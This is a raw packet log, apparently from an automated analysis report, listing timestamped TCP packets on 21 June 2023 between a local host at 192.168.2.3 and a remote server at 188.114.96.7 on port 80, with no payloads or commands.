Jun 21, 2023 04:27:46.061013937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061038017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061057091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061062098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061079979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061086893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061105013 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061113119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061139107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061141014 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061162949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061187983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061193943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061203957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061213970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061233997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061239004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061263084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061264038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061285019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061290026 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061311007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061316967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061342001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061343908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061372042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061407089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061407089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061436892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061439991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061464071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061485052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061503887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061525106 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061530113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061553001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061563969 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061577082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061598063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061600924 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061620951 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061623096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061645031 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061645031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061670065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061670065 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061691999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061692953 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061714888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061717033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061736107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061737061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061758995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061758995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061781883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061783075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061801910 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061824083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061824083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061846018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061846972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061867952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061868906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061889887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061891079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061912060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061913013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061934948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061934948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061955929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061976910 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061980009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.061999083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062019110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062021971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062042952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062042952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062063932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062066078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062086105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062087059 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062105894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062112093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062129974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062130928 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062149048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062170982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062170982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062252045 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062342882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062362909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062381983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062402964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062411070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062422037 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062446117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062467098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062469006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062489986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062506914 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062520027 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062535048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062544107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062556982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062577963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062586069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062602043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062628031 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062653065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062654018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062654018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062654018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062669992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062674046 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062680960 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062693119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062696934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062711954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062716007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062730074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062732935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062747955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062752008 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062766075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.062791109 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062791109 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.062988043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063013077 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063023090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063043118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063045025 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063061953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063071966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063081026 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063086033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063102007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063102007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063126087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063129902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063148975 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063148975 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063168049 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063170910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063188076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063190937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063206911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063210011 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063225031 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063229084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063244104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063246965 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063262939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063263893 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063280106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063287020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063298941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063299894 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063318014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063322067 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063338041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063340902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063355923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063364029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063374996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063393116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063400984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063414097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063432932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063447952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063451052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063469887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063476086 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063488007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063505888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063512087 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063524008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063543081 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063548088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063561916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.063584089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.063966036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064001083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064019918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064038992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064049959 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064058065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064078093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064079046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064079046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064095974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064115047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064119101 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064119101 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064135075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064137936 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064152956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064156055 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064172029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064179897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064197063 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064197063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064219952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064224005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064244032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064249992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064270973 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064275980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064301014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064323902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064327955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064349890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064373016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064376116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064400911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064421892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064425945 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.064439058 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.064461946 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.065311909 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081378937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081406116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081444025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081469059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081481934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081492901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081516981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081520081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081541061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081563950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081567049 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081588984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081595898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081612110 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081612110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081639051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081676006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081700087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081701994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081739902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081748962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081764936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081788063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081792116 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081811905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081814051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081837893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081840038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081860065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081861019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081885099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081886053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081913948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081918001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081943989 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081945896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081970930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.081990957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.081991911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082015038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082019091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082041979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082067966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082071066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082102060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082123995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082132101 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082146883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082154036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082171917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082179070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082189083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082195997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082220078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082226992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082254887 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082256079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082281113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082287073 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082319021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082329988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082384109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082411051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082437038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082461119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082467079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082484007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082484961 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082509041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.082509995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082528114 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.082874060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.094234943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094270945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094300985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094333887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094362020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.094366074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094383955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.094397068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094429016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094444990 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.094460011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094518900 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.094847918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094891071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.094957113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.095854044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.095886946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.095916986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.095947981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.095990896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096019983 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096031904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096084118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096116066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096144915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096148968 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096172094 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096174955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096204996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096234083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096237898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096290112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096328974 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096360922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096394062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096426010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096451044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096460104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096487045 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.096493006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096524954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.096550941 CEST	49709	80	192.168.2.3	188.114.96.7
